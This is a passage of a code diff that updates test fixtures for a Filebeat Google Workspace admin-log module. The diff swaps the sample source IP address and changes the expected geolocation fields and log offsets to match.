+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json
index 555f9bec5b0d..8345b2726e31 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -24,23 +24,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -61,7 +57,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -75,26 +71,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 437,
+        "log.offset": 436,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -115,7 +107,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -128,26 +120,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 900,
+        "log.offset": 898,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -168,7 +156,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -182,26 +170,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1323,
+        "log.offset": 1320,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -222,7 +206,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -234,26 +218,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1782,
+        "log.offset": 1778,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -274,7 +254,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -286,26 +266,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2154,
+        "log.offset": 2149,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -326,7 +302,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -338,26 +314,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2535,
+        "log.offset": 2529,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -378,7 +350,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -392,26 +364,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2907,
+        "log.offset": 2900,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -432,7 +400,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -445,26 +413,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3360,
+        "log.offset": 3352,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -485,7 +449,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -499,26 +463,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3759,
+        "log.offset": 3750,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -539,7 +499,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
